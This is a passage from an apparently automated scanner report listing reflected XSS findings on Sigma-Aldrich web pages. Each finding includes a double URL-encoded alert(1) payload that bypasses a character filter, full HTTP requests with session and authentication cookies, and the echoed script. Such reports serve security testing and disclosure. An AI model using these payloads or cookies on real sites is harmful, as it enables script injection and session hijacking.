Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/db3d7%2522%253balert%25281%2529%252f%252f49e75eec73/en-us/home/services/scale-up-solutions HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:53 GMT
Content-Length: 28950
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/db3d7";alert(1)//49e75eec73/en-us/home/services/scale-up-solutions","E404") ;
   </script>
...[SNIP]...

1.73. http://www.sigmaaldrich.com/content/safc-pharma/en-us/home/large-molecule-biologics [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/safc-pharma/en-us/home/large-molecule-biologics

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af575%2522%253balert%25281%2529%252f%252fd3f26007b52 was submitted in the REST URL parameter 1. This input was echoed as af575";alert(1)//d3f26007b52 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /contentaf575%2522%253balert%25281%2529%252f%252fd3f26007b52/safc-pharma/en-us/home/large-molecule-biologics HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:49 GMT
Content-Length: 28959
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/contentaf575";alert(1)//d3f26007b52/safc-pharma/en-us/home/large-molecule-biologics","E404") ;
   </script>
...[SNIP]...

1.74. http://www.sigmaaldrich.com/content/safc-pharma/en-us/home/large-molecule-biologics [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/safc-pharma/en-us/home/large-molecule-biologics

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d7dd%2522%253balert%25281%2529%252f%252fbcdc9532a6e was submitted in the REST URL parameter 2. This input was echoed as 8d7dd";alert(1)//bcdc9532a6e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/8d7dd%2522%253balert%25281%2529%252f%252fbcdc9532a6e/en-us/home/large-molecule-biologics HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:53 GMT
Content-Length: 28948
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/8d7dd";alert(1)//bcdc9532a6e/en-us/home/large-molecule-biologics","E404") ;
   </script>
...[SNIP]...

1.75. http://www.sigmaaldrich.com/content/safc-pharma/en-us/home/small-molecule-api/services-overview [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/safc-pharma/en-us/home/small-molecule-api/services-overview

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68a09%2522%253balert%25281%2529%252f%252f19b43806d4c was submitted in the REST URL parameter 1. This input was echoed as 68a09";alert(1)//19b43806d4c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content68a09%2522%253balert%25281%2529%252f%252f19b43806d4c/safc-pharma/en-us/home/small-molecule-api/services-overview HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:54 GMT
Content-Length: 28971
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content68a09";alert(1)//19b43806d4c/safc-pharma/en-us/home/small-molecule-api/services-overview","E404") ;
   </script>
...[SNIP]...

1.76. http://www.sigmaaldrich.com/content/safc-pharma/en-us/home/small-molecule-api/services-overview [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/safc-pharma/en-us/home/small-molecule-api/services-overview

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6c9a%2522%253balert%25281%2529%252f%252fb2927071e03 was submitted in the REST URL parameter 2. This input was echoed as f6c9a";alert(1)//b2927071e03 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/f6c9a%2522%253balert%25281%2529%252f%252fb2927071e03/en-us/home/small-molecule-api/services-overview HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:58 GMT
Content-Length: 28960
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/f6c9a";alert(1)//b2927071e03/en-us/home/small-molecule-api/services-overview","E404") ;
   </script>
...[SNIP]...

1.77. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/analytical-chromatography/analytical-chromatography-catalog [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/analytical-chromatography/analytical-chromatography-catalog

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0a76%2522%253balert%25281%2529%252f%252f6370404ea8b was submitted in the REST URL parameter 1. This input was echoed as a0a76";alert(1)//6370404ea8b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /contenta0a76%2522%253balert%25281%2529%252f%252f6370404ea8b/sigma-aldrich/areas-of-interest/analytical-chromatography/analytical-chromatography-catalog HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
